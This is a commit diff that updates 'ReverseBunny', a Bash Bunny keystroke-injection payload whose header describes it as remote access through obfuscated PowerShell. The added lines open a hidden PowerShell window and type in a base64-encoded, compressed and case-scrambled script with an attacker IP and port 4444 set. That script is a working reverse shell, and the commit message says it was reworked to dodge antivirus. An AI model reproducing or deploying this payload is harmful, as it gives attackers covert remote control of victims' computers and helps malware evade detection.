Updated ReverseBunny to version 1.2

Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design
2025-10-29 16:58:25 +00:00 · 2021-11-29 17:52:03 +01:00
parent 3fc0d9c857
commit da3c27ddea
1 changed files with 29 additions and 38 deletions
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -3,53 +3,44 @@
 # Title:         ReverseBunny
 # Description:   Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
 # Author:        0iphor13
-# Version:       1.1
+# Version:       1.2
 # Category:      Remote_Access
-# Attackmodes:   HID, Storage
+# Attackmodes:   HID

 LED SETUP

-GET SWITCH_POSITION
+#GET SWITCH_POSITION
 DUCKY_LANG de

-rm /root/udisk/DONE
-
-ATTACKMODE HID STORAGE
-
-#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
-
-LED STAGE1
+ATTACKMODE HID
+#WAIT_FOR_PRESENT Your_Device

 DELAY 5000
-RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass"
-DELAY 6000
+Q GUI r
+DELAY 5000
+Q STRING "powershell -NoP -NonI -W hidden"
+DELAY 5000
+Q ENTER

-Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))"
-DELAY 10000
-Q ENTER
-DELAY 10000
-Q CONTROL v
-DELAY 10000
-Q ENTER
 DELAY 1000
-
-LED STAGE2
-
-until  [ -f /root/udisk/DONE ]
-	do
-	sleep 0.2
-done
-
-LED CLEANUP
-
-rm /root/udisk/DONE
-
-DELAY 100
-
-sync
-
-DELAY 100
+Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I"
+DELAY 1000
+Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH"
+DELAY 1000
+Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R"
+DELAY 1000
+Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ"
+DELAY 1000
+Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf"
+DELAY 1000
+Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN"
+DELAY 1000
+Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ"
+DELAY 1000
+Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp"
+DELAY 1000
+Q STRING "ReSS ) | %{ NEw-ObJECt  systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )"
+DELAY 1000
+Q ENTER

 LED FINISH
-
-#SAVE TO EJECT